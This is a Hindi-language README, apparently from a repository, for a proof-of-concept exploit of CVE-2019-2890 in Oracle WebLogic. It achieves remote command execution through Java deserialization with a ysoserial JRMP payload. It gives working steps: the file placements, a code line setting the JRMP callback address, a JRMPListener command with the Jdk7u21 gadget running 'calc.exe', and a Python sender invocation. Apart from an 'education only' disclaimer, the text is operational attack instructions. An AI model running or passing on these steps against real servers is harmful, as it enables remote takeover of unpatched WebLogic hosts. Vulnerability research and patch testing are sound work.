
CVE-2019-2890 के लिए PoC एक्सप्लॉइट जो Oracle WebLogic को लक्षित करता है, ysoserial JRMP पेलोड का उपयोग करके सीरियलाइज़्ड ऑब्जेक्ट डी-सीरियलाइज़ेशन के माध्यम से दूरस्थ कमांड निष्पादन के लिए।
केवल शिक्षा और सीखने के उद्देश्यों के लिए उपयोग करें। अन्य उपयोगों के परिणाम स्वयं भुगतने होंगे।
संबंधित jar फ़ाइलों को पहले से ही प्रोजेक्ट में आयात कर दिया गया है, और उपयोग का तरीका yso के JRMP का उपयोग करता है। सीखने और डीबग करते समय उपयोग के तरीके को बदला जा सकता है।
पहले, weblogic के अंतर्गत SerializedSystemIni.dat फ़ाइल को security फ़ोल्डर में रखना होगा।
फिर, yso को ysoserial.jar नाम से बदलना होगा और इसे lib निर्देशिका में आयात करना होगा।

फिर, weblogic/wsee/jaxws/persistence/PersistentContext.java फ़ाइल में getObject के IP पते और पोर्ट को सेट करें।
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
अंत में, रिमोट JRMP लिसनर का उपयोग करके, 7u21 कमांड निष्पादित करें।
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
उपयोग विधि: Poc.java चलाकर poc.ser सीरियलाइज़ेशन फ़ाइल उत्पन्न करें, फिर:
python weblogic.py ip port poc.ser

